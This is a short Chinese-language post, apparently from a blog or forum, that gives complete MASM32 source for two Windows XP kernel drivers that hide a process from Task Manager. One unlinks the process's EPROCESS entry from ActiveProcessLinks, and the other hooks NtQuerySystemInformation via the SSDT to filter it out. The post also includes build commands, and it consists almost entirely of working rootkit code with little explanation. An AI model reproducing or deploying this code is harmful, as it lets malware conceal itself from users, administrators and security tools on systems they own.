C++ code colored by C++2HTML
作者:dge
进程隐藏的两种方法
这两种都是很古老的方法,因为无聊,所以写了一下。代码在XP_SP2下调试通过.
(1).从活动进程链表(ActiveProcessLinks)中摘除自身,这种方法可以欺骗任务管理器,
下面这个程序做的就是双向链表的删除节点和插入节点,十分的简单。
;f:\masm32\bin\ml /nologo /c /coff HideProcess_ActiveProcessLinks.asm
;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:HideProcess_ActiveProcessLinks.sys /subsystem:native HideProcess_ActiveProcessLinks.obj
.386 .model flat, stdcall
option casemap:none ;---------------------------------------------------------------------------------------------------- ; I N C L U D E F I L E S ;---------------------------------------------------------------------------------------------------- include f:\masm32\include\w2k\ntstatus.inc include f:\masm32\include\w2k\ntddk.inc include f:\masm32\include\w2k\ntoskrnl.inc include f:\masm32\include\w2k\w2kundoc.inc includelib f:\masm32\lib\w2k\ntoskrnl.lib include f:\masm32\Macros\Strings.mac
_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP ;---------------------------------------------------------------------------------------------------- ; C O N S T A N T S ;---------------------------------------------------------------------------------------------------- .const CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4 CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4
.data szHide db 'explorer.exe',0 Flink dd ? Blink dd ?
Explorer dd ? ;---------------------------------------------------------------------------------------------------- ; C O D E ;---------------------------------------------------------------------------------------------------- .code DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING local status:NTSTATUS local pDeviceObject:PDEVICE_OBJECT local dwId,lpEprocess local ListOffset,NameOffset local IdOffset local Version ; int 3 ; invoke DbgPrint,$CTA0("\n\nEntry DriverEntry\n\n") mov status,STATUS_DEVICE_CONFIGURATION_ERROR invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject .if eax==STATUS_SUCCESS mov eax,pDriverObject assume eax:ptr DRIVER_OBJECT mov [eax].DriverUnload, offset _DriverUnload assume eax:nothing ;获得得系统版本 invoke PsGetVersion,NULL,addr Version,NULL,NULL
mov eax,Version cmp eax,0 jne l1 mov ListOffset,0A0h mov NameOffset,1fch jmp l2
l1: cmp eax,1 jne exit mov ListOffset,88h mov NameOffset,174h
l2: invoke PsGetCurrentProcessId mov dwId,eax invoke PsLookupProcessByProcessId,dwId,addr lpEprocess mov esi,lpEprocess add esi,ListOffset mov edi,esi assume edi:PLIST_ENTRY assume esi:PLIST_ENTRY
l3: mov edx,[esi].Flink
;比较是否为最后一个EPROCESS
cmp edx,edi
je l4 assume esi:nothing
sub esi,ListOffset add esi,NameOffset invoke strcmp,esi,addr szHide .if eax == 0 sub esi,NameOffset
add esi,ListOffset
mov Explorer,esi assume esi:PLIST_ENTRY
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;删除节点
mov eax,[esi].Flink
mov ebx,[esi].Blink mov [ebx].Flink,eax mov [eax].Blink,ebx
mov Flink,eax mov Blink,ebx assume eax:nothing
assume ebx:nothing
invoke DbgPrint,$CTA0("\n\n************hide process successful ***********\n\n") jmp l4 .endif ;恢复EPROCESS指针 sub esi,NameOffset
add esi,ListOffset
assume esi:PLIST_ENTRY
mov esi,[esi].Flink jmp l3
l4:
assume esi:nothing
assume edi:nothing
mov status,STATUS_SUCCESS
exit:
.endif
mov eax,status ret mov eax,STATUS_DEVICE_CONFIGURATION_ERROR ret DriverEntry endp ;---------------------------------------------------------------------------------------------------- ; D R I V E R U N L O A D ;---------------------------------------------------------------------------------------------------- _DriverUnload proc pDriverObject:PDRIVER_OBJECT ; int 3 ; invoke DbgPrint,$CTA0("\n\nEntry DriverUnload\n\n") pushad
mov eax,Flink mov ebx,Explorer assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;恢复被摘除的节点
mov [eax].Blink,ebx
mov [ebx].Flink,eax mov eax,Blink mov [eax].Flink,ebx mov [ebx].Blink,eax popad ;清除符号连接 invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
mov eax, pDriverObject
;删除在初始化创建的设备
invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject ret _DriverUnload endp ;---------------------------------------------------------------------------------------------------- ; E N D ;----------------------------------------------------------------------------------------------------
end DriverEntry
(2).如果你反汇编taskmgr.exe,可以在发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的,
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为,从而实现在任务管理器中隐藏进程的目的,下面就是实现代码。 ;f:\masm32\bin\ml /nologo /c /coff hook_NtQuerySystemInformation.asm ;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:hook_NtQuerySystemInformation.sys /subsystem:native hook_NtQuerySystemInformation.obj .386 .model flat, stdcall
option casemap:none ;---------------------------------------------------------------------------------------------------- ; I N C L U D E F I L E S ;---------------------------------------------------------------------------------------------------- include f:\masm32\include\w2k\ntstatus.inc include f:\masm32\include\w2k\ntddk.inc include f:\masm32\include\w2k\native.inc include f:\masm32\include\w2k\ntoskrnl.inc includelib f:\masm32\lib\w2k\ntoskrnl.lib include f:\masm32\Macros\Strings.mac ;---------------------------------------------------------------------------------------------------- ; D A T A ;---------------------------------------------------------------------------------------------------- .data ;保存地址 dwOldNtQuerySystemInformation dd ? dwAddr dd ? ;---------------------------------------------------------------------------------------------------- ; C O N S T A N T S ;---------------------------------------------------------------------------------------------------- .const CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4 CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4 CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4 ;---------------------------------------------------------------------------------------------------- ; C O D E ;---------------------------------------------------------------------------------------------------- .code NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return pushad test eax,eax jnz exit .if SysInfoClass == SystemProcessesAndThreadsInformation mov esi,lpSysInfo mov ebx,esi add esi,[esi]
@@: add esi,38h ;在38h偏移处取得进程名字。
invoke RtlCompareUnicodeString,addr processname, esi, 1 .if eax== 0 invoke DbgPrint, $CTA0("\nsuccessful \n")
.if dword ptr[esi-38h] == 0 mov dword ptr[ebx],0 jmp exit .else
sub esi,38h mov edx,[esi] add [ebx],edx add esi,[esi] jmp @B .endif .else
sub esi,38h cmp dword ptr[esi],0 jz exit mov ebx,esi add esi,[esi] jmp @B .endif
.endif exit: popad
ret
NewNtQuerySystemInformation endp ;---------------------------------------------------------------------------------------------------- ; H O O K F U N C ;---------------------------------------------------------------------------------------------------- HookFunction proc
pushad ; int 3 ; invoke DbgPrint, $CTA0("\nEntry into hoookfunction\n") ;下面是用KeServiceDescriptorTabled导出符号获得数组的基地址,这个数组中包含有NtXXXX函数的入口地址。 mov eax, [KeServiceDescriptorTable] mov esi, [eax] mov esi, [esi] ;下面五句为获取ZwQuerySystemInformation的地址 mov eax,ZwQuerySystemInformation inc eax inc eax mov eax,[eax] mov eax,[eax] inc eax movzx ecx,byte ptr[eax] sal ecx,2
add esi,ecx mov dwAddr,esi
mov edi,dword ptr[esi] ;保存旧的函数地址。 mov dwOldNtQuerySystemInformation,edi mov edi,offset NewNtQuerySystemInformation ;修改入口地址 cli
mov dword ptr[esi],edi sti popad mov eax, STATUS_SUCCESS ret HookFunction endp ;---------------------------------------------------------------------------------------------------- ; DriverUnload ;---------------------------------------------------------------------------------------------------- DriverUnload proc pDriverObject:PDRIVER_OBJECT ;必须保存环境,否则后果很严重。在这个函数中恢复被修改的地址。
pushad ; int 3 ; invoke DbgPrint, $CTA0("\nEntry into DriverUnload \n") mov esi,dwAddr mov eax,dwOldNtQuerySystemInformation cli mov dword ptr[esi],eax sti invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName mov eax,pDriverObject invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
popad
ret DriverUnload endp ;---------------------------------------------------------------------------------------------------- ; D R I V E R E N T R Y ;---------------------------------------------------------------------------------------------------- DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING local status:NTSTATUS local pDeviceObject:PDEVICE_OBJECT ; int 3 ; invoke DbgPrint, $CTA0("\nEntry into DriverEntry\n") mov status, STATUS_DEVICE_CONFIGURATION_ERROR invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject .if eax == STATUS_SUCCESS mov eax, pDriverObject assume eax:ptr DRIVER_OBJECT mov [eax].DriverUnload, offset DriverUnload assume eax:nothing
invoke HookFunction
mov status, STATUS_SUCCESS .endif
mov eax, status ret DriverEntry endp
end DriverEntry ;---------------------------------------------------------------------------------------------------- ; E N D ;----------------------------------------------------------------------------------------------------